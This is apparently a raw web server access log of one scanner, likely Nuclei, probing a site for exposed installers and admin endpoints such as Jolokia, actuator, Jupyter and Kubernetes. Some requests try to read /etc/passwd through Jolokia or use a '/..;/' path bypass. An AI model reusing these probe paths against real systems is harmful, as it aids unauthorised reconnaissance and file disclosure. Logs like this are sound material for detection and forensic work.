/nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:51:20 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:20 103.153.214.94 GET /install.php a=check 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 200 2023-10-15 01:51:24 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:28 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:32 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:36 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:51:41 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:51:45 103.153.214.94 GET /password-page/ovf/account-credentials-ovf - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 215 2023-10-15 01:51:45 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:51:49 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:51:53 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:51:57 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:52:01 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:52:05 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:52:09 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:52:13 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:18 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:22 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:26 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:31 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:35 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:39 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:43 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 200 2023-10-15 01:52:47 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 200 2023-10-15 01:52:51 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:52:56 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:52:58 103.153.214.94 GET /setup - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 200 2023-10-15 01:52:58 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:53:04 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:53:08 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 205 2023-10-15 01:53:08 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:53:11 103.153.214.94 GET /install.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 578 2023-10-15 01:53:14 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:53:18 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:53:22 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 202 2023-10-15 01:53:26 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:53:31 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:53:35 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:53:39 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:53:44 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:53:48 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:53:52 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:53:56 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:54:00 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:54:06 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:54:10 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:54:14 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:54:18 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:54:24 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 208 2023-10-15 01:54:28 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:54:32 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:54:36 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:54:41 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 201 2023-10-15 01:54:45 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 201 2023-10-15 01:54:49 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:54:54 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:54:58 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:55:02 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 200 2023-10-15 01:55:06 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:55:10 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:55:15 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 200 2023-10-15 01:55:19 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:55:23 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:55:27 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 202 2023-10-15 01:55:31 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 202 2023-10-15 01:55:35 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:55:40 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:55:44 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:55:44 103.153.214.94 GET /ecrire/ exec=install 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 204 2023-10-15 01:55:48 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 208 2023-10-15 01:55:53 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:55:57 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:01 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:05 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:09 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:13 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:18 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:56:22 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 200 2023-10-15 01:56:26 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:29 103.153.214.94 GET /index.php /installer 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 200 2023-10-15 01:56:29 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:56:34 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:56:38 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:56:42 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:46 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:46 103.153.214.94 GET /admin/install/install.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 301 0 0 209 2023-10-15 01:56:50 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:56:55 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:56:58 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:02 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:07 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 198 2023-10-15 01:57:11 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 202 2023-10-15 01:57:15 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 204 2023-10-15 01:57:19 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:24 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:27 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:29 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:33 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:57:37 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:42 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 203 2023-10-15 01:57:45 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:49 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 199 2023-10-15 01:57:54 103.153.214.94 GET /nuclei.svg WOYKV=x 443 - 193.123.37.162 - - 200 0 0 201 2023-10-15 02:01:08 103.153.214.94 GET /typo3/install.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 206 2023-10-15 02:01:16 103.153.214.94 GET /manage/wizard/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 200 2023-10-15 02:03:18 103.153.214.94 GET /index.php module=Install&view=Index 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207 2023-10-15 02:10:13 103.153.214.94 GET /wp-admin/install.php step=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209 2023-10-15 02:10:22 103.153.214.94 GET /application/install/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 02:12:09 103.153.214.94 GET /search - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 207 2023-10-15 02:12:42 103.153.214.94 GET /zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 02:12:44 103.153.214.94 GET /zp/zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 200 2023-10-15 02:12:46 103.153.214.94 GET /gallery/zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 02:12:48 103.153.214.94 GET /zenphoto/zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202 2023-10-15 02:13:10 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 207 2023-10-15 02:15:40 103.153.214.94 GET /jbossws/services - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 203 2023-10-15 02:15:48 103.153.214.94 GET /signup - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 209 2023-10-15 02:16:20 103.153.214.94 GET /monitoring - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 201 2023-10-15 02:16:20 103.153.214.94 GET /..;/monitoring - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 200 2023-10-15 02:20:39 103.153.214.94 GET /robots.txt - 443 - 207.46.13.230 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 384 2023-10-15 02:20:43 103.153.214.94 GET /sitemap.xml - 443 - 52.167.144.22 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 480 2023-10-15 02:20:43 103.153.214.94 GET /sitemap.xml - 443 - 52.167.144.22 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 410 2023-10-15 02:21:06 103.153.214.94 GET /jolokia/list - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200 2023-10-15 02:21:08 103.153.214.94 GET /actuator/jolokia/list - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 200 2023-10-15 02:22:15 103.153.214.94 GET /jolokia/search/*:test=test - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203 2023-10-15 02:22:17 103.153.214.94 GET /actuator/jolokia/search/*:test=test - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 200 2023-10-15 02:23:07 103.153.214.94 GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-15 02:23:10 103.153.214.94 GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206 2023-10-15 02:27:43 103.153.214.94 GET /ipython/tree - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205 2023-10-15 02:28:43 103.153.214.94 GET /lab/api/settings/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203 2023-10-15 02:29:03 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206 2023-10-15 02:30:45 103.153.214.94 GET /pipeline/apis/v1beta1/runs page_size=5&sort_by=created_at%20desc 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 02:30:47 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 201 2023-10-15 02:30:50 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 200 2023-10-15 02:30:52 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-15 02:30:54 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 205 2023-10-15 02:30:57 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 637 2023-10-15 02:30:58 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 202 2023-10-15 02:31:00 103.153.214.94 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 202 2023-10-15 02:31:02 103.153.214.94 GET /actuator/jolokia/read/java.lang:type=Memory - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 200 2023-10-15 02:31:04 103.153.214.94 GET /jolokia/read/java.lang:type=Memory - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 02:31:06 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 02:31:08 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 202 2023-10-15 02:31:10 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 200 2023-10-15 02:31:12 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 200 2023-10-15 02:31:14 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 201 2023-10-15 02:31:18 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 02:31:19 103.153.214.94 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 199 2023-10-15 02:31:41 103.153.214.94 GET /pods - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 202 2023-10-15 02:31:42 103.153.214.94 GET /api/v1/pods - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 0 2 216 2023-10-15 02:34:08 103.153.214.94 GET /v2/keys/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 211 2023-10-15 02:34:10 103.153.214.94 GET /_ignition/health-check - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 212 2023-10-15 02:34:32 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 212 2023-10-15 02:46:56 103.153.214.94 GET /api/stats - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 0 2 217 2023-10-15 02:46:58 103.153.214.94 GET /horizon/api/stats - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 698 2023-10-15 02:47:02 103.153.214.94 GET /api/jsonws - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 2 209 2023-10-15 02:49:12 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 216 2023-10-15 02:51:30 103.153.214.94 GET /ADSearch.cc methodToCall=search 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208 2023-10-15 02:52:12 103.153.214.94 GET /images/json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 205 2023-10-15 02:52:44 103.153.214.94 GET /ajax-api/2.0/preview/mlflow/experiments/get experiment_id=0 443 - 193.123.37.162 